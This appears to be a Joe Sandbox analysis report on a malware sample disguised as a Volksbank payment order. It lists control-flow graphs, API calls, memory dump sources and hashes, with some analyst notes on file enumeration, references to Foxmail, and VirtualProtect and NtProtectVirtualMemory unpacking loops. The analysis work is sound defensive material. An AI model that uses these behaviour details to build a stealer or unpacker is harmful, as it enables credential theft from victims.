34f41246 5810->5812 5811->5812 5814 34f4173a 35 API calls 5811->5814 5813 34f41e89 5 API calls 5812->5813 5815 34f41258 5813->5815 5814->5812 5816 34f410f1 56 API calls 5815->5816 5817 34f4126d 5816->5817 5818 34f41e89 5 API calls 5817->5818 5819 34f4127f 5818->5819 5820 34f410f1 56 API calls 5819->5820 5821 34f412e6 5820->5821 5821->5778 5823 34f41cf1 5822->5823 5824 34f41d0f CopyFileW CreateFileW 5823->5824 5825 34f41d44 DeleteFileW 5824->5825 5826 34f41d55 GetFileSize 5824->5826 5831 34f41808 5825->5831 5827 34f41ede 22 API calls 5826->5827 5828 34f41d66 ReadFile 5827->5828 5829 34f41d94 CloseHandle DeleteFileW 5828->5829 5830 34f41d7d CloseHandle DeleteFileW 5828->5830 5829->5831 5830->5831 5831->5798 5832 34f41ede 5831->5832 5834 34f4222f 5832->5834 5835 34f4224e 5834->5835 5838 34f42250 5834->5838 5850 34f4474f 5834->5850 5855 34f447e5 5834->5855 5835->5801 5837 34f42908 5839 34f435d2 RaiseException 5837->5839 5838->5837 5862 34f435d2 
[Control-flow graph edge list for the functions disassembled from the 34F40000 region; the node-by-node rendering is omitted here. The API references it carries, by area: string building with lstrlenW / lstrcatW (routine around 34f4160c, with a helper at 34f41c9d); a routine at 34f4c7c4 that calls GetModuleHandleA, GetProcAddress, VirtualProtect twice in a row and LdrInitializeThunk, worth examining first because it resolves an export by name and then changes page protection twice, the API-level shape of code patching (a hook install or removal, or unpacking), which the graph alone cannot distinguish; error handlers at 34f42ada (IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess) and 34f42639 (IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter), whose API sets match the MSVC CRT's security-failure and fastfail handlers rather than a malware-specific debugger check; heap, TLS and lock housekeeping (RtlAllocateHeap, HeapFree, GetProcessHeap, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, InitializeCriticalSectionAndSpinCount, RtlInitializeSListHead, RtlInterlockedFlushSList); dynamic import resolution (LoadLibraryExW, GetProcAddress, FreeLibrary, GetLastError, SetLastError); process startup data (GetCommandLineA, GetCommandLineW, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter); console and file output (GetConsoleCP, GetConsoleMode, WriteConsoleW, WideCharToMultiByte, WriteFile, SetFilePointerEx, SetStdHandle, CloseHandle); RaiseException; and, in a separate image, lstrlenW and CharPrevW at 405b7c.]

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 34F41137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34F41151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34F41193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 34F411D0
• FindClose.KERNEL32(00000000), ref: 34F411DB
The call order (string length and concatenation, then FindFirstFileW, FindNextFileW, FindClose) is a directory-enumeration loop over a path the function assembles at run time. The same references (34F41137, 34F41151) appear on this page as subcalls of 34F410F1, so that is the function's start address.
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 3aa253f162d89775e1cb3a6e0945ff3ecb4f52b1b93d4143e72cdd9a787a72a4
• Instruction ID: eeeec01f6fda75c505b0b1b1385cc33850b7d3a0f5b68af8f581d8873a8463e8
• Opcode Fuzzy Hash: 3aa253f162d89775e1cb3a6e0945ff3ecb4f52b1b93d4143e72cdd9a787a72a4
• Instruction Fuzzy Hash: 06219371504308ABD720EB65EC4CF9B7B9CEF84354F080D2AB958D3291EB30D64687D6

Control-flow Graph

Basic blocks and edges recovered from the graph text (the executed / not-executed colouring of the rendered graph is not preserved here):
  122  2d41207-2d4123b
  123  2d4123d-2d4124c  call 2d41756
  125  2d41253-2d41263
  126  2d4124e
  127  2d41265-2d4126c  Sleep
  128  2d41273-2d412c8  NtProtectVirtualMemory, call 2d41756
  130  2d412cd-2d412e1
Edges: 122->123, 123->125, 123->126, 125->127, 125->128, 126->125, 127->122, 128->130, 130->122
Both successors of block 125 lead back to 122: 127 calls Sleep and loops directly, 128 calls NtProtectVirtualMemory and 2d41756 and loops via 130. The function is therefore a loop in the non-PE 025B5000 region that on each pass either sleeps or rewrites page protection, which is the delay-and-reprotect behaviour to look for when locating the next decrypted stage.
APIs
Memory Dump Source
• Source File: 00000001.00000002.7792890064.00000000025B5000.00000040.00000400.00020000.00000000.sdmp, Offset: 025B5000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_25b5000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 201ee6755f9b0c0f2be47f5d5ace9fd3901271bf45be85c1329fd8055c74557b
• Instruction ID: e15654bd0a160c14a4e14dce51951c2d55574a698da3e65ef4ffa7838b943332
• Opcode Fuzzy Hash: 201ee6755f9b0c0f2be47f5d5ace9fd3901271bf45be85c1329fd8055c74557b
• Instruction Fuzzy Hash: 731122B1A003019FEB009E34CDCDB9A7666EF40760F86C059E9A4CB1A2DB74C9C5CF12

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,?), ref: 34F41434
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 34F41137
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34F41151
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4115C
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4116D
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4117C
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34F41193
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 34F411D0
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: FindClose.KERNEL32(00000000), ref: 34F411DB
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 34F414C5
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 34F414E0
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 34F4150F
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 34F41521
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 34F41547
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 34F41553
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 34F41579
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 34F41585
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 34F415AB
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 34F415B7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                          • Opcode ID: 8c8db18cb97f5561d4bf6ecb4f8ced6d1625c13d07e83c823bc3a03e0013b8fe
                                                                                                                                                                                                                                          • Instruction ID: f8197d88e87a2f55b993bdc8551de884e3a7d4aafbf8a4d54fe0243c38120a9e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c8db18cb97f5561d4bf6ecb4f8ced6d1625c13d07e83c823bc3a03e0013b8fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2381D271A00368AAEB20DBA1DC45FDE7739EF84710F0409D6F608E7290EEB15A85CF94

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(34F4C7DD), ref: 34F4C7E6
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,34F4C7DD), ref: 34F4C838
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 34F4C860
                                                                                                                                                                                                                                            • Part of subcall function 34F4C803: GetProcAddress.KERNEL32(00000000,34F4C7F4), ref: 34F4C804
                                                                                                                                                                                                                                            • Part of subcall function 34F4C803: VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,34F4C7F4,34F4C7DD), ref: 34F4C816
                                                                                                                                                                                                                                            • Part of subcall function 34F4C803: VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,34F4C7F4,34F4C7DD), ref: 34F4C82A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                                                          • Opcode ID: 0d40a1f1873badcc7abd17615b577454aacf23acbaf30437919bc32e48719f70
                                                                                                                                                                                                                                          • Instruction ID: 3d3c7bf97a255ea7542e2f5b13d321da91dddc611001ee04a632527c7eb11f0e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d40a1f1873badcc7abd17615b577454aacf23acbaf30437919bc32e48719f70
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C211CE556452C1ACFB118674CC00AAA6FD89B277B0F1E3E5AA080C6393DDA4850383A6

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                                                          • Opcode ID: 3e908f2ecaa81469cdc02b0ad555967abb4b048711ac79a921ad9b24b7d5fded
                                                                                                                                                                                                                                          • Instruction ID: 3431f5c39f2340bc6ed7d3612044d5209ffa988d91859cd7e072b25a8f91761a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e908f2ecaa81469cdc02b0ad555967abb4b048711ac79a921ad9b24b7d5fded
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC1103556093C16EF72146748C40AB67FD98B677B4F1E2E8AD080CB383DDA48447C3B6

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 103 34f4c803-34f4c80b GetProcAddress 104 34f4c82d 103->104 105 34f4c80d-34f4c81a VirtualProtect 103->105 108 34f4c82f-34f4c833 104->108 106 34f4c82c 105->106 107 34f4c81c-34f4c82a VirtualProtect 105->107 106->104 107->106 109 34f4c835-34f4c83d GetModuleHandleA 108->109 110 34f4c872 LdrInitializeThunk 108->110 111 34f4c83f-34f4c847 109->111 111->111 112 34f4c849-34f4c84c 111->112 112->108 113 34f4c84e-34f4c850 112->113 114 34f4c856-34f4c85e 113->114 115 34f4c852-34f4c854 113->115 116 34f4c85f-34f4c865 GetProcAddress 114->116 115->116 119 34f4c866-34f4c86e 116->119 121 34f4c870 119->121 121->112
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,34F4C7F4), ref: 34F4C804
                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,34F4C7F4,34F4C7DD), ref: 34F4C816
                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,34F4C7F4,34F4C7DD), ref: 34F4C82A
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,34F4C7DD), ref: 34F4C838
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 34F4C860
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                                                                          • Opcode ID: 9140eaa08c5d122f984b313d2600f35573c21d4dae5556e03d594b9c17f04e83
                                                                                                                                                                                                                                          • Instruction ID: 57f41a4ff7c32f6ef319408e38a5063af54efcbf726faf637a6bd11f8d43dbb9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9140eaa08c5d122f984b313d2600f35573c21d4dae5556e03d594b9c17f04e83
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81F0C2856853C07CFA1145B48C41AB66FCC8B277B1B1E3E5AE140C7383DC95850783F6
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 34F461DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 34F461E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 34F461F1
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID: h#9/
• API String ID: 3906539128-176419635
• Opcode ID: 189828f2e5f8a30e522dbe9e744fbc3644d9080ae6b5b1509506b0fb4069ad10
• Instruction ID: 0a20859c7631741e42409035ac389393b802a3921f8971648f845c6098c4a390
• Opcode Fuzzy Hash: 189828f2e5f8a30e522dbe9e744fbc3644d9080ae6b5b1509506b0fb4069ad10
• Instruction Fuzzy Hash: 9D31D87490121C9BDB61DF24D98878DBBB4FF08310F5445EAE91CA7260EB349B828F45
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 34F42645
• IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 34F42710
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 34F42730
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 34F4273A
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 8966ce359cce6a56e5f40edb4934bcd43778f88519524c0e205861d602d95146
• Instruction ID: fea1b9cc699072c39eac7631b1a0bde9064b96ae1629be6199c423cd97255155
• Opcode Fuzzy Hash: 8966ce359cce6a56e5f40edb4934bcd43778f88519524c0e205861d602d95146
• Instruction Fuzzy Hash: 81314979D0521CDFEB10DFA4D9897CDBBB8AF08344F1044AAE50CAB250EB709A868F44
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 34F42276
• GetCurrentThreadId.KERNEL32 ref: 34F42285
• GetCurrentProcessId.KERNEL32 ref: 34F4228E
• QueryPerformanceCounter.KERNEL32(?), ref: 34F4229B
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 9abd86ed81c816cbd6c9b21c270a3cf8fa8880445c30883121caa87c95cd8546
• Instruction ID: 66443701e3b506d46df98f476a3657fa2c28c6b1adbcea3494824c1e8c3e96ca
• Opcode Fuzzy Hash: 9abd86ed81c816cbd6c9b21c270a3cf8fa8880445c30883121caa87c95cd8546
• Instruction Fuzzy Hash: 78F0AF70C10208EBCB00DBB4D549A9EBBF8FF18305F5244959402F7200EB34AB068B94
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,34F42C3B,34F4D1DC,00000017), ref: 34F42B21
• UnhandledExceptionFilter.KERNEL32(34F4D1DC,?,34F42C3B,34F4D1DC,00000017), ref: 34F42B2A
• GetCurrentProcess.KERNEL32(C0000409,?,34F42C3B,34F4D1DC,00000017), ref: 34F42B35
• TerminateProcess.KERNEL32(00000000,?,34F42C3B,34F4D1DC,00000017), ref: 34F42B3C
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
• Opcode ID: 787f31f03408b9559bb8b3dc22d2a667ec37cc466010b3d274e840a9e7b51286
• Instruction ID: 8c6dde3cf80e33b6ad5b742034939fabad6b4a8b47cbbddd92b3704e340a33bc
• Opcode Fuzzy Hash: 787f31f03408b9559bb8b3dc22d2a667ec37cc466010b3d274e840a9e7b51286
• Instruction Fuzzy Hash: 1ED01231004208ABD7002FE8FD0CA593F28EF14212F0A0000F709A3344CF318403CBD9
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID:
• String ID: .$h#9/
• API String ID: 0-1189678462
• Opcode ID: 8c84bab4a0bab4096dd0093da35ba8f3f053420ec9647574fd0e776becd36792
• Instruction ID: 4b96159a1fa1ea6917860e1b59d820ae023e38029e961bb15502301ed209e170
• Opcode Fuzzy Hash: 8c84bab4a0bab4096dd0093da35ba8f3f053420ec9647574fd0e776becd36792
• Instruction Fuzzy Hash: 84310775900209AFFB148E78CC84EEA7FBDDF45354F0849ACE518D7361EE349A468B50
APIs
• GetCurrentProcess.KERNEL32(?,?,34F44A8A,?,34F52238,?,34F44BBD,00000000,00000000,00000001,34F42082,34F52108,?,34F41F3A,?), ref: 34F44AD5
• TerminateProcess.KERNEL32(00000000,?,34F44A8A,?,34F52238,?,34F44BBD,00000000,00000000,00000001,34F42082,34F52108,?,34F41F3A,?), ref: 34F44ADC
• ExitProcess.KERNEL32 ref: 34F44AEE
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 0be41d67ad80ce556853d973a076a4ef84a70787489ac16cfa7e32a07287eb3d
• Instruction ID: 3017e7e8dd2cf3b5cb7d3d6fee0d5cd058c5b8a699d9476334e5b038ce45da7d
• Opcode Fuzzy Hash: 0be41d67ad80ce556853d973a076a4ef84a70787489ac16cfa7e32a07287eb3d
• Instruction Fuzzy Hash: 3CE0B636000608EFDF016F68ED08A497F69FF50385B594814F905AB765DF39DD43CA98
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,34F4B5BC,?,?,?,?,?,34F4B25C,00000000), ref: 34F4B7EE
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 79de7150018ad77b78578e178c69f89fb8040821852fe4eb1fc1ba1e246d2b4d
                                                                                                                                                                                                                                          • Instruction ID: 089d9f13380dae2a7e905950d8b0e02b2fd4bdb980e6f2e44b1c672155660fb5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79de7150018ad77b78578e178c69f89fb8040821852fe4eb1fc1ba1e246d2b4d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1B128766106098FE705CF28C486B547FA0FF45365F698A9CE899CF3A2CB35D992CB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 34F4294C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                          • Opcode ID: 7002a8774baf9477f5a7ad9d7ca5b7c934798456a710e04070bd4f706412a663
                                                                                                                                                                                                                                          • Instruction ID: 4e1c1018584ef545ac6e4b06c8cde19c833f9b5e1f0feb759e9046a59768dce3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7002a8774baf9477f5a7ad9d7ca5b7c934798456a710e04070bd4f706412a663
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D44191B29012058BEB15CF59D98169EBBF8FB48394F1D896AD805F7384D770DA42CBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                          • Opcode ID: cb329d800b82afbd4527145045713855adbd5824f700f281201a1cffc4f7ebdb
                                                                                                                                                                                                                                          • Instruction ID: ac5e50bb17baa27bb723e050f2564c769dd5e38f1593a08629e72176117689fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb329d800b82afbd4527145045713855adbd5824f700f281201a1cffc4f7ebdb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BA011302002028F83088E38A20A20C3AECEA0228030A00A8A808E220CFB2080028A88

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.7792667737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.7792636395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792707770.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792742913.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792818028.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ErrorModeVersionlstrlen
• String ID: NSIS Error$UXTHEME
• API String ID: 758611499-110662866
